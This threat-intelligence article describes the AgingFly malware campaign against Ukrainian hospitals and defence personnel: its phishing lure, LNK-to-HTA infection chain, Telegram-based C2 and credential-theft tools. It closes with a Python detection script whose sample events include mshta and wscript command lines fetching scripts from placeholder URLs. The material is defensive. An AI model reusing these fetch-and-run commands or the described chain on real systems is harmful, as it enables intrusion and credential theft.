A newly discovered threat called AgingFly malware has been striking Ukrainian hospitals, emergency services, and local government bodies in a campaign that ran from March through April 2026. The attacks, identified by Ukraine’s Computer Emergency Response Team (CERT-UA), are designed to steal login credentials, extract sensitive data from messaging apps, and hand attackers full remote control over infected systems. The group behind the campaign, tracked as UAC-0247, has no established prior history, and its origins remain unknown.
The timing is no accident. Targeting healthcare infrastructure during wartime puts pressure on systems that cannot afford downtime. And the methods UAC-0247 used show a level of technical sophistication that goes well beyond a simple phishing run.
A Phishing Lure Designed for Wartime
The attack begins with an email. The message claims to offer humanitarian aid, a topic with obvious relevance and urgency in the context of the ongoing conflict. Recipients are urged to click a link, which takes them to one of two types of sites: a legitimate website that attackers had already compromised through a cross-site scripting (XSS) vulnerability, or a convincing fake site built with the help of AI tools.
Either way, the destination serves the same purpose. The victim downloads a ZIP archive containing a Windows shortcut file (LNK). Opening it triggers a built-in Windows handler that reaches out to a remote server, fetches an HTML Application (HTA) file, and executes it. The HTA displays a decoy form to keep the victim distracted while the real infection quietly begins in the background.
This is a multi-stage chain, and each step is designed to look normal. Native Windows tools do the heavy lifting, which makes it harder for security software to flag anything unusual.
What AgingFly Malware Actually Does
Once the infection chain completes, AgingFly malware is deployed. It is written in C# and gives its operators an extensive toolkit: remote system control, command execution, file theft, screenshot capture, keylogging, and the ability to run arbitrary code on the victim’s machine.
Communication with the attacker’s command-and-control (C2) server happens over WebSockets, and the traffic is encrypted using AES-CBC. That makes the data stream harder to inspect or flag at the network level.
But AgingFly malware has one feature that sets it apart from most backdoors. It arrives on the infected system without any pre-built command handlers. Instead, those handlers are sent from the C2 server as source code and compiled directly on the victim’s machine at runtime. This approach means the initial payload is small, its behavior is harder to predict, and security tools that rely on static detection — scanning for known code patterns — may find nothing to flag.
CERT-UA described it this way: the absence of built-in command handlers in the code, with functionality instead retrieved from the C2 server and dynamically compiled at runtime, is a distinguishing feature of AgingFly compared to similar malware families.
SILENTLOOP and the Telegram Connection
Alongside AgingFly malware, attackers deploy a PowerShell-based tool called SILENTLOOP. It handles persistence, executes commands, and updates the malware’s configuration. One of its more unusual capabilities is pulling the C2 server address from a Telegram channel. If that channel goes down, fallback mechanisms kick in. This approach makes the infrastructure resilient and harder to disrupt by simply taking down a single server.
Using Telegram as part of C2 infrastructure is a tactic that has appeared in other campaigns targeting Ukraine. It works because Telegram traffic blends in with ordinary encrypted messaging, and blocking it outright would cause its own operational problems for organisations.
Stealing Credentials and Moving Through the Network
Once inside, the attackers move quickly to extract data and expand their access. Two open-source tools do most of the credential theft.
ChromElevator, a tool originally built for security research, can decrypt and extract cookies and saved passwords from Chromium-based browsers — Google Chrome, Microsoft Edge, and Brave among them — without needing administrator privileges. ZAPiDESK, a forensic tool, targets WhatsApp for Windows by decrypting its local databases.
After pulling that data, the attackers conduct network reconnaissance using custom scripts alongside publicly available utilities. RustScan handles port scanning. Ligolo-ng and Chisel enable covert tunnelling, letting attackers move through the network without generating obvious traffic.
This combination of open-source and custom tooling is deliberate. Using widely available tools makes attribution harder, because those tools appear in many different kinds of security activity, not just attacks.
Defense Forces Also in the Crosshairs
The campaign extended beyond civilian infrastructure. In March, CERT-UA identified a separate incident targeting individuals connected to Ukraine’s Defense Forces. Attackers distributed a trojanized version of software used by FPV drone operators through the Signal messaging platform. The file was packaged to look like a legitimate update. Running it triggered a DLL side-loading attack that installed AgingFly malware without any of the earlier phishing steps.
This variant of the campaign shows that UAC-0247 adapted its delivery method based on the target. For civilian institutions, email phishing worked. For defense-linked personnel, Signal and a convincing software package made more sense.
How to Reduce the Risk
CERT-UA has published guidance for organisations looking to limit their exposure. The core recommendations focus on restricting what Windows can run. Blocking the execution of LNK, HTA, and JavaScript files removes several of the steps UAC-0247 relies on. Limiting or monitoring the use of native Windows utilities — particularly mshta.exe, PowerShell, and wscript.exe — cuts off the tools the attackers used to move from the phishing stage to the infection stage.
These are not complex changes, but they require deliberate configuration. Many organisations leave these capabilities open because legitimate software sometimes uses them. That convenience creates the gaps this campaign exploited.
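One way to turn the guidance above, and the LNK-to-HTA chain described earlier, into something a SOC can actually run is to check process-creation telemetry for the native utilities the article names. The script below is an added example written for this page, not CERT-UA's or the article's own code. It parses a few constructed Sysmon-style process-creation records (pipe-separated key=value fields, a format assumed for the example) and flags mshta.exe or wscript.exe being handed a URL, PowerShell being launched by one of those script hosts, and mshta.exe started from explorer.exe. Hostnames and paths in the sample data are placeholders, not indicators from the campaign.

```python
"""Detection sketch for living-off-the-land script-host activity.

Added example, not code from the article or from CERT-UA. Field names,
record format and all sample values are assumptions made for this example.
"""
import re
from typing import Dict, List, Tuple

# Constructed sample events. Hostnames and paths are placeholders only.
SAMPLE_EVENTS = """\
ParentImage=C:\\Windows\\explorer.exe|Image=C:\\Windows\\System32\\mshta.exe|CommandLine=mshta.exe https://placeholder.invalid/aid/form.hta
ParentImage=C:\\Windows\\System32\\mshta.exe|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|CommandLine=powershell.exe -w hidden -c "Get-Date"
ParentImage=C:\\Windows\\explorer.exe|Image=C:\\Program Files\\Vendor\\app.exe|CommandLine="C:\\Program Files\\Vendor\\app.exe"
ParentImage=C:\\Windows\\System32\\services.exe|Image=C:\\Windows\\System32\\wscript.exe|CommandLine=wscript.exe C:\\Scripts\\logon.vbs
ParentImage=C:\\Windows\\explorer.exe|Image=C:\\Windows\\System32\\wscript.exe|CommandLine=wscript.exe //e:jscript http://placeholder.invalid/update.js
"""

# The utilities the article's mitigation section singles out.
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)


def basename(path: str) -> str:
    """Return the lower-cased file name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def parse_events(text: str) -> List[Dict[str, str]]:
    """Parse one 'Key=Value|Key=Value' record per non-empty line."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = dict(part.split("=", 1) for part in line.split("|"))
        events.append(fields)
    return events


def evaluate(event: Dict[str, str]) -> List[str]:
    """Return the list of findings (empty if benign) for one event."""
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    findings = []
    # A script host pulling its script straight from a URL: the HTA fetch
    # step of the chain, and not something a normal logon script does.
    if image in SCRIPT_HOSTS and URL_RE.search(cmd):
        findings.append(f"{image} given a remote URL on its command line")
    # PowerShell spawned by mshta/wscript: the hand-off from the decoy
    # stage to the real payload stage.
    if image == "powershell.exe" and parent in SCRIPT_HOSTS:
        findings.append(f"powershell.exe spawned by script host {parent}")
    # mshta launched by the shell means a user double-clicked something
    # (a shortcut or an .hta); worth a look even without a URL.
    if image == "mshta.exe" and parent == "explorer.exe":
        findings.append("mshta.exe launched from explorer.exe")
    return findings


def detect(text: str) -> List[Tuple[int, str]]:
    """Run every rule over every record; return (line_number, finding)."""
    hits = []
    for index, event in enumerate(parse_events(text), start=1):
        for finding in evaluate(event):
            hits.append((index, finding))
    return hits


if __name__ == "__main__":
    for line_no, finding in detect(SAMPLE_EVENTS):
        print(f"event {line_no}: {finding}")
```

Events 3 and 4 (an ordinary application launch and a wscript logon script with a local path) produce nothing, which is the point: the rules key on the combination of script host plus remote content or plus a suspicious parent, not on the utility's mere presence. Where an organisation can block LNK, HTA and JavaScript execution outright, as CERT-UA recommends, these rules become a safety net for the exceptions it has to leave open.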
Final Thoughts
The AgingFly malware campaign is a clear example of how wartime conditions create new attack surfaces. Humanitarian aid phishing works because the offer feels plausible. Targeting hospitals and emergency services works because those institutions are under pressure and may lack the resources to maintain a strong security posture.
What makes AgingFly malware technically notable is its architecture. Compiling command handlers on the victim’s machine at runtime, pulling C2 addresses from Telegram, and combining custom tools with open-source utilities all point to an operation designed to stay undetected for as long as possible. Whether the goal was intelligence gathering, disruption, or both, the infrastructure built around this campaign was not thrown together quickly.
CERT-UA’s identification and disclosure of these techniques gives defenders a fighting chance. But it also makes clear that the cyber dimension of the conflict in Ukraine is evolving, not winding down.